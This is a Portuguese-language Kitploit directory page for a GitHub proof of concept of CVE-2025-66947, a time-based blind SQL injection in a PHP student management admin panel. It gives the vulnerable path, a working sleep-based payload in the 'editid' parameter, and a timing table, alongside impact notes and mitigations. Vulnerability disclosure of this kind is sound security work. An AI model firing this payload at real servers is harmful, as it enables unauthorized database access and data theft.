Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-66947 — Prova de conceito para injeção SQL cega baseada em tempo em um painel administrativo PHP. Demonstra exploração via parâmetro GET não sanitizado, com orientação de mitigação para uso defensivo. | Kitploit
Ferramentas/GitHubGitHub/kabir0104k/cve-2025-66947
Análise de VulnerabilidadesExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoSegurança de Banco de Dados
GitHubkabir0104k/cve-2025-66947

CVE-2025-66947

Prova de conceito para injeção SQL cega baseada em tempo em um painel administrativo PHP. Demonstra exploração via parâmetro GET não sanitizado, com orientação de mitigação para uso defensivo.

Ver Repositório
11há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-66947

Injeção SQL Cega Baseada em Tempo no krishanmuraiji SMS v1.0

⏱️ Comparação visual: resposta normal vs resposta atrasada ~6s

🔍 Resumo

TL;DR: Um parâmetro GET em um módulo administrativo permite injeção SQL baseada em tempo através de atrasos na resposta.

Uma vulnerabilidade de injeção SQL cega baseada em tempo existe no krishanmuraiji SMS v1.0 devido à validação inadequada de um parâmetro GET em um módulo administrativo.


🎯 Componente Afetado

  • Arquivo: /studentms/admin/edit-class-detail.php
  • Parâmetro: editid (GET)
  • Problema: Entrada não sanitizada usada diretamente na consulta SQL

🧪 Prova de Conceito (PoC)

Passo 1 — Requisição Normal

/studentms/admin/edit-class-detail.php?editid=12

Passo 2 — Injetar Payload Baseada em Tempo

/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)

Resultado Esperado

  • Resposta do servidor atrasada em ~6 segundos
  • Nenhuma mensagem de erro visível
  • Atraso confirma injeção SQL

⏱️ Verificação de Temporização

PayloadAtraso
sleep(3)~3s
sleep(6)~6s
sleep(15)~15s

Atraso consistente = Injeção SQL Confirmada

📌 Onde Esse Padrão Aparece

Esse padrão de vulnerabilidade aparece comumente em:

  • Aplicações PHP CRUD
  • Sistemas de Estudante / Biblioteca / Inventário
  • Painéis administrativos que confiam em parâmetros GET numéricos
  • Aplicações com erros SQL desabilitados

🛡️ Impacto

  • Divulgação de informações do banco de dados
  • Modificação não autorizada de dados
  • Escalação de privilégios
  • Comprometimento do banco de dados backend

🧠 Por Que Isso é Importante

Mesmo quando a autenticação é necessária e erros são ocultados,
A injeção SQL baseada em tempo continua explorável e perigosa.

Severidade: Alta

🔧 Mitigação

  • Usar declarações preparadas
  • Validar parâmetros numéricos
  • Evitar concatenação de consultas SQL
  • Aplicar acesso ao banco de dados com privilégios mínimos

🆔 CVE

CVE-2025-66947

👤 Descobridor

Ranjan Kumar

⚠️ Aviso Legal

Esta PoC é fornecida apenas para fins educacionais e defensivos.

CVE-2025-66947, Injeção SQL, Injeção SQL Cega Baseada em Tempo, PHP, Painel Administrativo

Baixar ferramenta